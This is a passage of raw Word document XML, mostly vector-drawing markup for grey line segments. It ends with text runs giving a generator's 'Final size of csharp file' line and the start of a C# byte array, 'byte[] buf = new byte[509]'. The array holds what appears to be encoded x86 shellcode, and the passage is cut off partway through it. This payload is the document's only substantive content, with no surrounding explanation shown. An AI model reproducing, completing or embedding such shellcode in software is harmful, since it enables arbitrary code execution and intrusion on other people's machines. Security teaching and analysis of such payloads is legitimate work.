        <v:shape style="position:absolute;left:1177;top:8197;width:82;height:322" coordorigin="1177,8197" coordsize="82,322" path="m1217,8203l1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8203,1217,8204,1217,8204,1217,8204,1217,8204,1217,8204,1217,8204,1217,8204,1217,8205,1217,8205,1217,8205,1217,8205,1217,8206,1217,8206,1217,8206,1217,8207,1217,8207,1217,8207,1217,8208,1217,8208,1217,8209,1217,8210,1217,8210,1217,8211,1217,8211,1217,8212,1217,8213,1217,8214,1217,8215,1217,8215,1217,8216,1217,8217,1217,8218,1217,8219,1217,8220,1217,8222,1217,8223,1217,8224,1217,8225,1217,8227,1217,8228,1217,8230,1217,8231,1217,8233,1217,8234,1217,8236,1217,8238,1217,8240,1217,8242,1217,8244,1217,8246,1217,8248,1217,8250,1217,8252,1217,8254,1217,8257,1217,8259,1217,8262,1217,8264,1217,8267,1217,8270,1217,8272,1217,8275,1217,8278,1217,8281,1217,8284,1217,8288,1217,8291,1217,8294,1217,8298,1217,8301,1217,8305,1217,8309,1217,8313,1217,8316,1217,8320,1217,8325,1217,8329,1217,8333,1217,8337,1217,8342,1217,8346,1217,8351,1217,8356,1217,8361,1217,8366,1217,8371,1217,8376,1217,8381,1217,8387,1217,8392,1217,8398,1217,8403,1217,8409,1217,8415,1217,8421,1217,8428,1217,8434,1217,8440,1217,8447,1217,8453,1217,8460,1217,8467,1217,8474,1217,8481,1217,8488,1217,8496,1217,8503e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:424.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8497" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8497;width:82;height:322" coordorigin="1177,8497" coordsize="82,322" path="m1217,8503l1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8503,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8504,1217,8505,1217,8505,1217,8505,1217,8505,1217,8505,1217,8506,1217,8506,1217,8506,1217,8507,1217,8507,1217,8508,1217,8508,1217,8509,1217,8509,1217,8510,1217,8510,1217,8511,1217,8512,1217,8512,1217,8513,1217,8514,1217,8515,1217,8516,1217,8516,1217,8517,1217,8518,1217,8520,1217,8521,1217,8522,1217,8523,1217,8524,1217,8526,1217,8527,1217,8528,1217,8530,1217,8531,1217,8533,1217,8535,1217,8536,1217,8538,1217,8540,1217,8542,1217,8544,1217,8546,1217,8548,1217,8550,1217,8552,1217,8554,1217,8557,1217,8559,1217,8562,1217,8564,1217,8567,1217,8570,1217,8573,1217,8575,1217,8578,1217,8581,1217,8585,1217,8588,1217,8591,1217,8594,1217,8598,1217,8601,1217,8605,1217,8609,1217,8613,1217,8617,1217,8621,1217,8625,1217,8629,1217,8633,1217,8638,1217,8642,1217,8647,1217,8651,1217,8656,1217,8661,1217,8666,1217,8671,1217,8676,1217,8681,1217,8687,1217,8692,1217,8698,1217,8704,1217,8709,1217,8715,1217,8721,1217,8728,1217,8734,1217,8740,1217,8747,1217,8754,1217,8760,1217,8767,1217,8774,1217,8781,1217,8789,1217,8796,1217,8803e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:439.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8797" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8797;width:82;height:322" coordorigin="1177,8797" coordsize="82,322" path="m1217,8803l1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8803,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8804,1217,8805,1217,8805,1217,8805,1217,8805,1217,8806,1217,8806,1217,8806,1217,8807,1217,8807,1217,8807,1217,8808,1217,8808,1217,8809,1217,8809,1217,8810,1217,8810,1217,8811,1217,8812,1217,8812,1217,8813,1217,8814,1217,8815,1217,8816,1217,8817,1217,8818,1217,8819,1217,8820,1217,8821,1217,8822,1217,8823,1217,8824,1217,8826,1217,8827,1217,8828,1217,8830,1217,8831,1217,8833,1217,8835,1217,8836,1217,8838,1217,8840,1217,8842,1217,8844,1217,8846,1217,8848,1217,8850,1217,8852,1217,8855,1217,8857,1217,8859,1217,8862,1217,8865,1217,8867,1217,8870,1217,8873,1217,8876,1217,8879,1217,8882,1217,8885,1217,8888,1217,8891,1217,8895,1217,8898,1217,8902,1217,8905,1217,8909,1217,8913,1217,8917,1217,8921,1217,8925,1217,8929,1217,8933,1217,8938,1217,8942,1217,8947,1217,8951,1217,8956,1217,8961,1217,8966,1217,8971,1217,8976,1217,8982,1217,8987,1217,8992,1217,8998,1217,9004,1217,9010,1217,9016,1217,9022,1217,9028,1217,9034,1217,9041,1217,9047,1217,9054,1217,9060,1217,9067,1217,9074,1217,9081,1217,9089,1217,9096,1217,9104e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:454.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9097;width:82;height:322" coordorigin="1177,9097" coordsize="82,322" path="m1217,9104l1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9105,1217,9105,1217,9105,1217,9105,1217,9105,1217,9106,1217,9106,1217,9106,1217,9107,1217,9107,1217,9107,1217,9108,1217,9108,1217,9109,1217,9109,1217,9110,1217,9111,1217,9111,1217,9112,1217,9113,1217,9113,1217,9114,1217,9115,1217,9116,1217,9117,1217,9118,1217,9119,1217,9120,1217,9121,1217,9122,1217,9123,1217,9125,1217,9126,1217,9127,1217,9129,1217,9130,1217,9132,1217,9133,1217,9135,1217,9137,1217,9138,1217,9140,1217,9142,1217,9144,1217,9146,1217,9148,1217,9150,1217,9153,1217,9155,1217,9157,1217,9160,1217,9162,1217,9165,1217,9167,1217,9170,1217,9173,1217,9176,1217,9179,1217,9182,1217,9185,1217,9188,1217,9191,1217,9195,1217,9198,1217,9202,1217,9205,1217,9209,1217,9213,1217,9217,1217,9221,1217,9225,1217,9229,1217,9233,1217,9238,1217,9242,1217,9247,1217,9252,1217,9256,1217,9261,1217,9266,1217,9271,1217,9276,1217,9282,1217,9287,1217,9293,1217,9298,1217,9304,1217,9310,1217,9316,1217,9322,1217,9328,1217,9334,1217,9341,1217,9347,1217,9354,1217,9361,1217,9367,1217,9374,1217,9382,1217,9389,1217,9396,1217,9404e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:469.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9397;width:82;height:322" coordorigin="1177,9397" coordsize="82,322" path="m1217,9404l1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9405,1217,9405,1217,9405,1217,9405,1217,9405,1217,9406,1217,9406,1217,9406,1217,9407,1217,9407,1217,9407,1217,9408,1217,9408,1217,9409,1217,9409,1217,9410,1217,9410,1217,9411,1217,9411,1217,9412,1217,9413,1217,9414,1217,9414,1217,9415,1217,9416,1217,9417,1217,9418,1217,9419,1217,9420,1217,9421,1217,9422,1217,9423,1217,9425,1217,9426,1217,9427,1217,9429,1217,9430,1217,9432,1217,9433,1217,9435,1217,9437,1217,9438,1217,9440,1217,9442,1217,9444,1217,9446,1217,9448,1217,9450,1217,9453,1217,9455,1217,9457,1217,9460,1217,9462,1217,9465,1217,9467,1217,9470,1217,9473,1217,9476,1217,9479,1217,9482,1217,9485,1217,9488,1217,9492,1217,9495,1217,9498,1217,9502,1217,9506,1217,9509,1217,9513,1217,9517,1217,9521,1217,9525,1217,9529,1217,9534,1217,9538,1217,9542,1217,9547,1217,9552,1217,9556,1217,9561,1217,9566,1217,9571,1217,9577,1217,9582,1217,9587,1217,9593,1217,9598,1217,9604,1217,9610,1217,9616,1217,9622,1217,9628,1217,9634,1217,9641,1217,9647,1217,9654,1217,9661,1217,9668,1217,9675,1217,9682,1217,9689,1217,9696,1217,9704e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:484.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9697" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9697;width:82;height:322" coordorigin="1177,9697" coordsize="82,322" path="m1217,9704l1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9704,1217,9705,1217,9705,1217,9705,1217,9705,1217,9705,1217,9706,1217,9706,1217,9706,1217,9706,1217,9707,1217,9707,1217,9707,1217,9708,1217,9708,1217,9709,1217,9709,1217,9710,1217,9710,1217,9711,1217,9712,1217,9712,1217,9713,1217,9714,1217,9714,1217,9715,1217,9716,1217,9717,1217,9718,1217,9719,1217,9720,1217,9721,1217,9722,1217,9724,1217,9725,1217,9726,1217,9728,1217,9729,1217,9730,1217,9732,1217,9734,1217,9735,1217,9737,1217,9739,1217,9740,1217,9742,1217,9744,1217,9746,1217,9748,1217,9751,1217,9753,1217,9755,1217,9757,1217,9760,1217,9762,1217,9765,1217,9768,1217,9770,1217,9773,1217,9776,1217,9779,1217,9782,1217,9785,1217,9788,1217,9792,1217,9795,1217,9799,1217,9802,1217,9806,1217,9809,1217,9813,1217,9817,1217,9821,1217,9825,1217,9829,1217,9834,1217,9838,1217,9843,1217,9847,1217,9852,1217,9857,1217,9861,1217,9866,1217,9872,1217,9877,1217,9882,1217,9887,1217,9893,1217,9899,1217,9904,1217,9910,1217,9916,1217,9922,1217,9928,1217,9935,1217,9941,1217,9947,1217,9954,1217,9961,1217,9968,1217,9975,1217,9982,1217,9989,1217,9997,1217,10004e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:499.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9997" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9997;width:82;height:322" coordorigin="1177,9997" coordsize="82,322" path="m1217,10004l1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10004,1217,10005,1217,10005,1217,10005,1217,10005,1217,10005,1217,10005,1217,10005,1217,10006,1217,10006,1217,10006,1217,10007,1217,10007,1217,10007,1217,10008,1217,10008,1217,10008,1217,10009,1217,10009,1217,10010,1217,10010,1217,10011,1217,10012,1217,10012,1217,10013,1217,10014,1217,10015,1217,10015,1217,10016,1217,10017,1217,10018,1217,10019,1217,10020,1217,10021,1217,10023,1217,10024,1217,10025,1217,10026,1217,10028,1217,10029,1217,10031,1217,10032,1217,10034,1217,10035,1217,10037,1217,10039,1217,10041,1217,10043,1217,10044,1217,10046,1217,10049,1217,10051,1217,10053,1217,10055,1217,10058,1217,10060,1217,10063,1217,10065,1217,10068,1217,10071,1217,10073,1217,10076,1217,10079,1217,10082,1217,10085,1217,10089,1217,10092,1217,10095,1217,10099,1217,10102,1217,10106,1217,10110,1217,10113,1217,10117,1217,10121,1217,10125,1217,10130,1217,10134,1217,10138,1217,10143,1217,10147,1217,10152,1217,10157,1217,10162,1217,10167,1217,10172,1217,10177,1217,10182,1217,10188,1217,10193,1217,10199,1217,10204,1217,10210,1217,10216,1217,10222,1217,10228,1217,10235,1217,10241,1217,10248,1217,10254,1217,10261,1217,10268,1217,10275,1217,10282,1217,10289,1217,10297,1217,10304e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:514.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10297" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10297;width:82;height:322" coordorigin="1177,10297" coordsize="82,322" path="m1217,10304l1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10304,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10305,1217,10306,1217,10306,1217,10306,1217,10306,1217,10307,1217,10307,1217,10307,1217,10308,1217,10308,1217,10309,1217,10309,1217,10309,1217,10310,1217,10311,1217,10311,1217,10312,1217,10313,1217,10313,1217,10314,1217,10315,1217,10316,1217,10316,1217,10317,1217,10318,1217,10319,1217,10320,1217,10322,1217,10323,1217,10324,1217,10325,1217,10326,1217,10328,1217,10329,1217,10331,1217,10332,1217,10334,1217,10335,1217,10337,1217,10339,1217,10341,1217,10343,1217,10345,1217,10347,1217,10349,1217,10351,1217,10353,1217,10355,1217,10358,1217,10360,1217,10363,1217,10365,1217,10368,1217,10371,1217,10373,1217,10376,1217,10379,1217,10382,1217,10386,1217,10389,1217,10392,1217,10395,1217,10399,1217,10402,1217,10406,1217,10410,1217,10414,1217,10417,1217,10421,1217,10426,1217,10430,1217,10434,1217,10438,1217,10443,1217,10447,1217,10452,1217,10457,1217,10462,1217,10467,1217,10472,1217,10477,1217,10482,1217,10488,1217,10493,1217,10499,1217,10505,1217,10510,1217,10516,1217,10522,1217,10529,1217,10535,1217,10541,1217,10548,1217,10554,1217,10561,1217,10568,1217,10575,1217,10582,1217,10589,1217,10597,1217,10604e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:529.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10597" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10597;width:82;height:322" coordorigin="1177,10597" coordsize="82,322" path="m1217,10604l1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10604,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10605,1217,10606,1217,10606,1217,10606,1217,10606,1217,10607,1217,10607,1217,10607,1217,10607,1217,10608,1217,10608,1217,10609,1217,10609,1217,10610,1217,10610,1217,10611,1217,10611,1217,10612,1217,10613,1217,10613,1217,10614,1217,10615,1217,10616,1217,10617,1217,10618,1217,10619,1217,10620,1217,10621,1217,10622,1217,10623,1217,10624,1217,10625,1217,10627,1217,10628,1217,10629,1217,10631,1217,10632,1217,10634,1217,10636,1217,10637,1217,10639,1217,10641,1217,10643,1217,10645,1217,10647,1217,10649,1217,10651,1217,10653,1217,10656,1217,10658,1217,10660,1217,10663,1217,10665,1217,10668,1217,10671,1217,10674,1217,10677,1217,10679,1217,10683,1217,10686,1217,10689,1217,10692,1217,10696,1217,10699,1217,10703,1217,10706,1217,10710,1217,10714,1217,10718,1217,10722,1217,10726,1217,10730,1217,10734,1217,10739,1217,10743,1217,10748,1217,10752,1217,10757,1217,10762,1217,10767,1217,10772,1217,10777,1217,10782,1217,10788,1217,10793,1217,10799,1217,10805,1217,10811,1217,10816,1217,10823,1217,10829,1217,10835,1217,10841,1217,10848,1217,10855,1217,10861,1217,10868,1217,10875,1217,10882,1217,10890,1217,10897,1217,10904e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:544.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10897" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10897;width:82;height:322" coordorigin="1177,10897" coordsize="82,322" path="m1217,10904l1217,10904,1217,10904,1217,10904,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10905,1217,10906,1217,10906,1217,10906,1217,10906,1217,10906,1217,10907,1217,10907,1217,10907,1217,10908,1217,10908,1217,10908,1217,10909,1217,10909,1217,10910,1217,10910,1217,10911,1217,10911,1217,10912,1217,10913,1217,10914,1217,10914,1217,10915,1217,10916,1217,10917,1217,10918,1217,10919,1217,10920,1217,10921,1217,10922,1217,10923,1217,10924,1217,10925,1217,10927,1217,10928,1217,10930,1217,10931,1217,10933,1217,10934,1217,10936,1217,10937,1217,10939,1217,10941,1217,10943,1217,10945,1217,10947,1217,10949,1217,10951,1217,10953,1217,10956,1217,10958,1217,10960,1217,10963,1217,10966,1217,10968,1217,10971,1217,10974,1217,10977,1217,10980,1217,10983,1217,10986,1217,10989,1217,10992,1217,10996,1217,10999,1217,11003,1217,11006,1217,11010,1217,11014,1217,11018,1217,11022,1217,11026,1217,11030,1217,11034,1217,11039,1217,11043,1217,11048,1217,11052,1217,11057,1217,11062,1217,11067,1217,11072,1217,11077,1217,11083,1217,11088,1217,11094,1217,11099,1217,11105,1217,11111,1217,11117,1217,11123,1217,11129,1217,11135,1217,11142,1217,11148,1217,11155,1217,11161,1217,11168,1217,11175,1217,11183,1217,11190,1217,11197,1217,11205e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:559.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11197" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11197;width:82;height:322" coordorigin="1177,11197" coordsize="82,322" path="m1217,11205l1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11205,1217,11206,1217,11206,1217,11206,1217,11206,1217,11206,1217,11207,1217,11207,1217,11207,1217,11207,1217,11208,1217,11208,1217,11209,1217,11209,1217,11209,1217,11210,1217,11210,1217,11211,1217,11212,1217,11212,1217,11213,1217,11214,1217,11214,1217,11215,1217,11216,1217,11217,1217,11218,1217,11219,1217,11220,1217,11221,1217,11222,1217,11223,1217,11224,1217,11226,1217,11227,1217,11228,1217,11230,1217,11231,1217,11233,1217,11234,1217,11236,1217,11238,1217,11239,1217,11241,1217,11243,1217,11245,1217,11247,1217,11249,1217,11251,1217,11254,1217,11256,1217,11258,1217,11261,1217,11263,1217,11266,1217,11268,1217,11271,1217,11274,1217,11277,1217,11280,1217,11283,1217,11286,1217,11289,1217,11292,1217,11296,1217,11299,1217,11303,1217,11306,1217,11310,1217,11314,1217,11318,1217,11322,1217,11326,1217,11330,1217,11334,1217,11339,1217,11343,1217,11348,1217,11353,1217,11357,1217,11362,1217,11367,1217,11372,1217,11377,1217,11383,1217,11388,1217,11394,1217,11399,1217,11405,1217,11411,1217,11417,1217,11423,1217,11429,1217,11435,1217,11442,1217,11448,1217,11455,1217,11462,1217,11469,1217,11476,1217,11483,1217,11490,1217,11497,1217,11505e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:574.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11497" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11497;width:82;height:322" coordorigin="1177,11497" coordsize="82,322" path="m1217,11505l1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11505,1217,11506,1217,11506,1217,11506,1217,11506,1217,11506,1217,11506,1217,11507,1217,11507,1217,11507,1217,11508,1217,11508,1217,11508,1217,11509,1217,11509,1217,11510,1217,11510,1217,11511,1217,11511,1217,11512,1217,11512,1217,11513,1217,11514,1217,11515,1217,11515,1217,11516,1217,11517,1217,11518,1217,11519,1217,11520,1217,11521,1217,11522,1217,11523,1217,11524,1217,11526,1217,11527,1217,11528,1217,11530,1217,11531,1217,11533,1217,11534,1217,11536,1217,11538,1217,11540,1217,11541,1217,11543,1217,11545,1217,11547,1217,11549,1217,11551,1217,11554,1217,11556,1217,11558,1217,11561,1217,11563,1217,11566,1217,11569,1217,11571,1217,11574,1217,11577,1217,11580,1217,11583,1217,11586,1217,11589,1217,11593,1217,11596,1217,11599,1217,11603,1217,11607,1217,11610,1217,11614,1217,11618,1217,11622,1217,11626,1217,11630,1217,11635,1217,11639,1217,11643,1217,11648,1217,11653,1217,11658,1217,11662,1217,11667,1217,11672,1217,11678,1217,11683,1217,11688,1217,11694,1217,11699,1217,11705,1217,11711,1217,11717,1217,11723,1217,11729,1217,11735,1217,11742,1217,11748,1217,11755,1217,11762,1217,11769,1217,11776,1217,11783,1217,11790,1217,11797,1217,11805e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7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5" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Final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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>csharp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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file: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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2610</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="298" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2637" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>byte[]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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>buf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21"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>byte[509]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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0xd9,0xcc,0xd9,0x74,0x24,0xf4,0x5a,0xb8,0x76,0x1e,0x3d,0x54,0x2b,0xc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9,0xb1,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0x79,0x83,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0xc2,0x04,0x31,0x42,0x15,0x03,0x42,0x15,0x94,0xeb,0x83,0x64,0x7e,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0x17,0xee,0x5e,0xa8,0xce,0x7a,0x7b,0xa0,0xae,0xa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b,0x4a,0xf9,0x23,0x2f,0xa3,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0x05,0xf2,0x58,0x2d,0xf6,0x82,0xb7,0xaf,0x3d,0x91,0x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7c,0x80,0x6a,0xd8,0xba,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0x3b,0x5a,0xda,0xb6,0xca,0xc8,0x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eb,0x0d,0x8c,0x2a,0x94,0xc2,0x85,0x87,0xbc,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0x25,0xd1,0x6e,0x64,0xfe,0xc0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,0xf6,0x5e,0x9f,0x15,0x80,0x17,0x8f,0xaa,0xae,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0xff,0x22,0x6b,0x6b,0x46,0x14,0x4c,0x66,0x50,0xcb,0x1f,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x29,0x00,0x27,0x4c,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0x19,0x12,0x09,0x98,0x38,0x3e,0x6c,0xa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2,0x22,0x60,0xbf,0x99,0xdb,0xe7,0xc5,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0xa2,0x46,0x18,0xbd,0xc4,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0xae,0xd7,0x82,0xe3,0xbd,0xfe,0x40,0x33,0xf6,0xd2,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0x7a,0x6b,0xe1,0x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2f,0xf9,0x4b,0x8b,0xc3,0x57,0x26,0xfe,0xfd,0x91,0xf7,0x93,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0x4a,0xe1,0x85,0xeb,0x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68,0x16,0x42,0xc9,0x6f,0xac,0xef,0x28,0x05,0x46,0x76,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0x1b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,0xa3,0xb9,0xe9,0xbf,0x1a,0x56,0x3e,0xdc,0x4d,0xf3,0x9f,0x1b,0x09,0x55,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0x63,0x07,0xa3,0x59,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0xbc,0x57,0xad,0x72,0x53,0x6b,0xff,0x49,0x10,0x47,0x21,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0x81,0xb8,0x0e,0x98,0xec,0x03,0x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a3,0x9f,0x90,0xa3,0x15,0xc4,0x7d,0x87,0x5c,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0xcd,0xfe,0x32,0xca,0x11,0xf3,0x14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,0x20,0xc8,0x92,0x36,0x88,0xe8,0xa1,0xad,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0xac,0x46,0x19,0x9f,0x04,0x76,0x01,0x4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1,0x3d,0x3a,0x7d,0x80,0xa2,0x4e,0x24,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0xcb,0x6b,0xe7,0xc9,0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xc8,0xa4,0x01,0x17,0xb3,0x3a,0xd9,0x8e,0x9b,0x13,0x7b,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0xbf,0x49,0xf3,0xa9,0x71,0x57,0x49,0x54,0x60,0x32,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
